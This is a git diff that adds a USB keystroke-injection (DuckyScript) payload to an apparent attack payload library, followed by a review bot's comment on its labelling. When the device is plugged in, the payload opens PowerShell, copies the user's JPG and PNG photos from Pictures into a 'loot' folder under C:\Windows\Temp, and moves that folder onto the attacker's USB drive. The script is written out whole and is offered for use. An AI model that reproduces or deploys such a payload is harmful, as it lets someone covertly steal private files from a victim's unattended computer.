diff --git a/payloads/library/credentials/datacopier/datacopier b/payloads/library/credentials/datacopier/datacopier
new file mode 100644
index 0000000..9af7e62
--- /dev/null
+++ b/payloads/library/credentials/datacopier/datacopier
@@ -0,0 +1,31 @@
+REM Written and tested by Dante Sparda
+REM this took a lot of digging and research. please use responsibly.
+REM i wrote this on a wim but of course you can filter whatever you want to the loot folder
+REM I used some premise i found below and modified what i needed
+REM https://www.mathewjbray.com/powershell/powershell-get-drive-letters-by-volume-name-and-execute-robocopy/
+
+DELAY 1000
+GUI R
+DELAY 1000
+STRING powershell.exe
+ENTER
+DELAY 3000
+STRING cd C:\Users\$env:Username\Pictures\
+ENTER
+STRING get-childitem -Filter *.JPG", *.PNG" -path "C:\Users\$env:Username\Pictures\"
+ENTER
+STRING Copy-Item -path "C:\Users\$env:Username\Pictures\" -include "*.JPG", "*.PNG" -Destination "C:\Windows\Temp" -Force -PassThru
+ENTER
+STRING cd C:\Windows\Temp
+ENTER
+STRING mkdir loot
+ENTER
+STRING $destinationLabel = "DUCKY"
+ENTER
+STRING $destinationLetter = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq $destinationLabel} | select -expand name
+ENTER
+STRING get-childitem -Filter .jpg*, .png* -path C:\Windows\Temp | move-item -Destination "C:\Windows\Temp\loot"
+ENTER
+STRING move-item -path C:\Windows\Temp\loot -Destination $destinationLetter
+ENTER
+END
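Review bot: The REM header does not state what this payload reads or what it leaves on the host, and the file sits under `credentials` although the keystrokes in this hunk only handle `*.JPG`/`*.PNG` files from the user's Pictures folder. I would add `REM Target: Windows with PowerShell; copies image files from the user's Pictures folder to the volume labelled DUCKY` and `REM Host artifacts: copies of those files are written under C:\Windows\Temp before the move`, so an authorised tester can account for the data and a defender knows what to look for. The category looks wrong for this content; a directory named for file collection would describe it better, if the library has one.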